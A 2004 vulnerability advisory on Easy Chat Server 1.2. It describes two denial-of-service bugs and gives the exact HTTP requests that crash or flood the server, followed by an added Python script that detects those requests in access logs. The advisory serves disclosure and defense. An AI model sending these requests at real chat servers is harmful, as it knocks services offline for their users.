                           Donato Ferrante


Application:  Easy Chat Server
              http://www.echatserver.com/

Version:      1.2

Bugs:         Multiple Vulnerabilities

Date:         02-Jul-2004

Author:       Donato Ferrante
              e-mail: fdonato@autistici.org
              web:    www.autistici.org/fdonato


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bugs
3. The code
4. The fix

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"Easy Chat Server is an easy, fast and affordable way to host and
manage your own real-time communication software, it allows
friends/colleagues to chat with you through a Web Browser (IE,
Netscape, Mozilla, Opera etc.) on any computer (Windows, Linux,
Solaris...) without any special plug-ins or software. It can help
you set up your community chat rooms, collaborative work sessions or
online meetings."


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
2. The bugs:
-------------

The program has two DoS vulnerabilities, due to:

 - long username
 - fake users


[1] The program does not handle the username correctly: sending a
    very long username string to the server crashes it.

[2] The program has no strong checks on users who join free rooms,
    so it is possible to add a large number of fake users until the
    chat server goes down.


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerabilities:

[1]

 GET /chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0
 Host: http://[host]


[2]

 GET /chat.ghp?username=FakeUser&password=&room=1&sex=0
 Host: http://[host]

 ( this will add a fake user with name: FakeUser )


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

Vendor was contacted.
Bugs will be fixed in the next version.


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
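
Until a fixed version is installed, both request patterns from section 3
can be spotted in proxy or access logs. The check below is an added
example, not part of the original advisory or of the vendor's code. The
two limits and the (client, request target) log format are assumptions;
the advisory does not state a safe username length or user count.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

MAX_USERNAME_LEN = 32        # assumed policy limit, not a vendor value
MAX_NAMES_PER_CLIENT = 5     # assumed limit per log window, not a vendor value


def review_chat_requests(entries):
    """Flag /chat.ghp joins matching bug [1] (long username) or [2] (fake users).

    entries: iterable of (client_ip, request_target) taken from a log.
    Returns a list of (client_ip, reason) tuples.
    """
    findings = []
    names_by_client = defaultdict(set)
    for client, target in entries:
        url = urlsplit(target)
        if url.path != "/chat.ghp":
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for name in params.get("username", []):
            names_by_client[client].add(name)
            if len(name) > MAX_USERNAME_LEN:
                findings.append(
                    (client, f"oversized username ({len(name)} chars)"))
    # Bug [2]: one client joining under many different names.
    for client, names in names_by_client.items():
        if len(names) > MAX_NAMES_PER_CLIENT:
            findings.append(
                (client, f"join flood ({len(names)} distinct usernames)"))
    return findings


# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE = [
    ("192.0.2.10", "/chat.ghp?username=alice&password=&room=1&sex=0"),
    ("192.0.2.20", "/chat.ghp?username=" + "a" * 303 + "&password=&room=1&sex=0"),
    ("192.0.2.10", "/index.htm"),
] + [
    ("192.0.2.30", f"/chat.ghp?username=FakeUser{i}&password=&room=1&sex=0")
    for i in range(8)
]

if __name__ == "__main__":
    for client, reason in review_chat_requests(SAMPLE):
        print(client, reason)
```

The same two limits can be enforced in a reverse proxy placed in front of
the chat server, rejecting the request before it reaches the application.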